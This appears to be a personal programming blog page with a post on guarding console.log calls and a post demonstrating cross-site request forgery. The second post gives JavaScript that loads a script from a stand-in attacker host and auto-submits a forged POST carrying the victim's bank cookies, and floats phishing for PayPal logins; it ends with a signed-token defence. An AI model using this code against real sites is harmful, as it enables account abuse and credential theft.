Using Firebug’s console without fear

Thursday, February 04 2010

I love Firebug, and I especially love sprinkling console.log calls around the place, but I hate the way things break when you forget to remove them and your code hits a browser without Firebug installed.

    if (typeof console === 'undefined') {
        var console = {}; // For once not having block scoping is kind of handy
        console.log = function () {};
    }
    
    console.log("It's safe to use console.log");

I feel there ought to be a smarter way of doing this but I just can’t think of one.


Tags: javascript ~ firebug ~ catalyst

Naughtiness in three easy steps.

Wednesday, August 20 2008

First, insert your code into a page from a.example.com. XSS via SQL injection is probably the right way.

    var sc = document.createElement('script');
    sc.setAttribute('type','text/javascript');
    sc.setAttribute('src','http://b.example.com/naughty.js');
    document.getElementsByTagName("head")[0].appendChild(sc);

Second, insert the code of your choice into the DOM from http://b.example.com/naughty.js. That’s a nice-to-have; you could have put this in the first script:

    var badform = document.createElement('FORM');
    document.body.appendChild(badform);
    // ... add appropriate fields to badform here
    badform.action="http://tastybank.example.com";
    badform.method = "POST"; // note that existing cookies for tastybank in this session will be sent
    var f = function () {badform.submit(); return false};
    f(); // we could make this an event handler on one or more DOM elements so the user really does it to themselves

Third, um, er, PROFIT.

But we don’t have to go as far as POSTing to another site. For example, suppose on inspecting a user’s history we notice they visited their PayPal account earlier. Why not redirect to a fake PayPal screen, and ask them to log in again? Quite a large proportion of users will hand over their credentials. You can harvest them and then redirect to a real PayPal screen. The possibilities are endless.

Or you can just write a Flash applet with cute kittens and do anything you want from there—I hear the Flash sandbox is kind of lax, and how else will we order Hell Pizza?

If you own TastyBank (or PayPal) the right thing to do is put signed unique tokens in all your forms and reject any forms that don’t have a valid token. Because there are more shitty PHP forum apps out there on popular sites than we will ever be able to track down and fix.
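One way to implement the signed unique tokens described above, as an added example that is not code from the original post. It assumes a Node.js server and uses HMAC-SHA256; the names `issueToken`, `verifyToken`, `handlePost` and the `csrf_token` field are hypothetical.

```javascript
// Added example: signed, per-session, expiring form tokens.
const crypto = require('crypto');

// Server-side signing key. Assumption: generated at start-up for this demo;
// a real deployment would load a persistent secret shared by all workers.
const SECRET = crypto.randomBytes(32);

function sign(payload) {
  return crypto.createHmac('sha256', SECRET).update(payload).digest('hex');
}

// Token layout: nonce.expiry.mac. The MAC covers the session id, so a token
// issued to one session is useless when replayed in another.
function issueToken(sessionId, ttlMs = 15 * 60 * 1000, now = Date.now()) {
  const nonce = crypto.randomBytes(16).toString('hex');
  const expires = String(now + ttlMs);
  return `${nonce}.${expires}.${sign(`${sessionId}|${nonce}|${expires}`)}`;
}

function verifyToken(sessionId, token, now = Date.now()) {
  if (typeof token !== 'string') return false;
  const parts = token.split('.');
  if (parts.length !== 3) return false;
  const [nonce, expires, mac] = parts;
  if (!/^[0-9a-f]{32}$/.test(nonce)) return false;   // malformed nonce
  if (!/^\d+$/.test(expires) || Number(expires) < now) return false; // expired
  const expected = Buffer.from(sign(`${sessionId}|${nonce}|${expires}`));
  const given = Buffer.from(mac);
  // Constant-time comparison; lengths must match before timingSafeEqual.
  return given.length === expected.length &&
         crypto.timingSafeEqual(given, expected);
}

// Check applied to every state-changing POST before any work is done.
// A form built by a script on another origin cannot read the token that was
// embedded in the genuine page, so its submission is rejected here even
// though the browser attaches the session cookie.
function handlePost(session, body) {
  if (!verifyToken(session.id, body.csrf_token)) {
    return { status: 403, body: 'invalid form token' };
  }
  return { status: 200, body: 'request accepted' };
}
```

The token goes into a hidden field when the server renders the form. It does not help if the injected script runs on the bank's own origin, where it can read the field directly.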


Tags: security ~ javascript ~ DOM


Rendered at 2010-03-14 07:06:56